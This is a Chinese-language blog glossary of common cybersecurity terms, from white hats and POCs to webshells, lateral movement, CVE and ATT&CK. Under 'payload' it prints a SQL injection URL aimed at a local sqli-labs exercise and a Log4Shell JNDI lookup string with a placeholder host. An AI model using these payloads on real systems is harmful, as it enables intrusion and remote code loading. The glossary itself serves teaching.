• 网络安全常用术语


    1、黑客(hacker)

    对计算机技术非常擅长的人,窃取数据、破坏计算机系统

    2.白帽子

    • 白帽子的目的是发现企业的漏洞并且上报给企 业,帮助其解决风险问题
    • 360补天、漏洞盒子、CNVDCNNVD

    3. 红帽黑客

    有正义感、爱国的黑客。利用技术维护国家网络 安全,并且对外来的攻击进行反击

    4.漏洞

    http://www.cnnvd.org.cn/web/wz/bzxqById.tag?id=3&mkid=3​​​​​​

    漏洞指的是硬件、软件、协议等等存在的安全缺陷

    5.POC

    • Proof of Concept
    • 能证明漏洞存在的代码

    6. exp

    • Exploit
    • 执行了这一段利用代码之后,就能够达到攻击的目的
    • msf

    7. payload(攻击载荷)

    • SQL注入   http://localhost/sqli-labs/Less-3/?id=-1') union select 1,1,database() --+
    • XSS
    • log4j ${jndi:ldap://xxxxxx.domain.cn/test}

    8. 0day

    使用量非常大的通用产品漏洞已经被发现了(还没有公开),官方还没有发布补丁或者修复方法的漏洞

    9. 1day

    漏洞的 POC EXP 已经被公开了,但是很多人还来不及修复,这个叫做 1day 漏洞

    10. Nday 漏洞

    指已经发布官方补丁的漏洞,并且时间已经过去很久的漏洞。

    11. 渗透测试

    用黑客入侵的方式对系统进行安全测试,目的是找出和修复安全漏洞,在这个过程中不会影响系统的正常运行,也不会破坏数据

    12. 肉鸡

    已经被黑客获得控制权限的机器,可能是个人电脑也可能是企业或者政府单位的服务
    器,通常情况下因为使用者并不知道已经被入侵,所以黑客可以长期获得权限和控制

    13. 抓鸡

    利用出现概率非常高漏洞(比如 log4j 、永恒之蓝),使用自动化方式获取肉鸡的行为

    14. 跳板机

    黑客为了防止被追溯和识别身份,一般都不会用自己的电脑发起攻击,而是利用获取的肉鸡来攻击其他目标,这个肉鸡就充当一个跳板的角色

    15. DDos

    • Distributed Denial of Service
    • 分布式拒绝服务攻击
    • 发起大量恶意请求,导致正常用户无法访问

    16. 中间人攻击

    • Man-in-the-Middle Attack         MITM攻击
    • 运行中间服务器,拦截并篡改数据

    17. 网络钓鱼

    钓鱼网站指的是冒充的网站,用来窃取用户的账号密码cookie

    18. webshell

    • shell是一种命令执行工具,可以对计算机进行控制
    • webshell就是aspphpjsp之外的web代码文件,通过这些代码文件可以执行任意的命令,对计算机做 任意的操作
    • 小马     一句话木马     大马

    19. Getshell

    • 获得命令执行环境的操作
    • Redis的持久化功能、MySQL的写文件功能,MySQL的日志记录功能、上传功能、数据备份功能、编辑器

    20. 横向移动

    攻击者入侵一台服务器成功以后,基于内部网络,继续入侵同网段的其他机器

    21. 代理(Proxy)

    帮我们发起网络请求的一台服务器

    22. VPN(Virtual Private Network)

    • 代理
    • 加密通信
    • 办公      在家里连接到公司内网

    23. 蜜罐(Honeypot)

    吸引攻击者攻击的伪装系统,用来实现溯源和反制

    24. 沙箱(Sandbox)

    沙箱是一种按照安全策略限制程序行为的执行环境,就算有恶意代码,也只能影响沙箱环境而不会影响到操作系统

    25. 堡垒机

    • 跳板机         jumpserver
    • 运维审计系统         管理资源,审批、审计、访问控制、事件记录

    26. APT

    Advanced Persistent Threat
    • APT攻击
    • 高级可持续威胁攻击,指某组织在网络上对特定对象展开的持续有效的攻击活动
    • 报告:2021深信服APT攻防趋势半年洞察

    27. 护网(HVV)

    国家组织牵头组织事业单位,国企单位,名企单位等开展攻防两方的网络安全演习

    28. CTF

    • bugku                   https://ctf.bugku.com/challenges/index. html
    • 北京联合大学       https://buuoj.cn/challenges
    • CTFHub               https://www.ctfhub.com/
    • bmzCTF               http://bmzclub.cn/challenges
    • 攻防世界              https://adworld.xctf.org.cn
    • CTFSHOW          https://ctf.show/challenges

    29. CVE

    • Common Vulnerabilities and Exposures  通用漏洞披露
    • Mitre    例如:CVE-2021-44228
    • https://www.cve.org/

    30. CNVD

    • 国家信息安全漏洞共享平台                         https://www.cnvd.org.cn/
    • 国家计算机应急响应中心 CNCERT维护     https://www.cert.org.cn/publish/main/index.html

    31. SRC

    • Security Response Center  企业的应急响应中心
    • http://0xsafe.org/ 
    • https://www.vulbox.com/
    • https://src.sjtu.edu.cn/

    32. ATT&CK

    •  Adversarial Tactics, Techniques, and Common Knowledge
    • 对抗战术、技术和通用知识
       (攻击者技战术的知识库)
    • Mitre
    • 风险分析模型
    • 收集威胁情报,模拟APT攻击

    33. DevOps

    • Development +Operations
    • 开发测试运维一体化

    34. CICD

    • 持续集成(Continuous Integration
    • 持续交付(Continuous Delivery
    • 持续部署(Continuous Deployment
    具体技术
       
     Git 代码管理、 Jenkins 版本管理、代码扫描、自动化测试

    35. DevSecOps

    Development + Security + Operations
    安全开发与运维

    36. 等保

    • 网络安全等级保护
    • 要求相关行业的单位和公司的信息系统必须进行定级,然后在公安机关备案。然后建设整改,然后由测评机构评级,并且持续维护和监督

    37. 网络空间测绘

    1. 网络空间资源收录
    2. 网络空间搜索引擎
    • www.shodan.io
    • fofa.so
    • www.zoomeye.org

     

     

  • 相关阅读:
    基于二叉树结构是刷题
    冒泡排序给cpu干懵了 哈哈 还有希尔排序 算法补充(学习笔记)
    主数据管理是数字化转型成功的基石——江淮汽车案例分享
    1028模拟赛-考后总结
    【人工智能】【Python】Matplotlib基础
    【元宇宙】临界质量,元宇宙的关键要素
    充电宝后台被攻击怎么办
    jenkins出错与恢复
    ROS2学习(1)—核心概念
    HTTP Error 500.31 - Failed to load ASP.NET Core runtime
  • 原文地址:https://blog.csdn.net/m0_61506558/article/details/126200698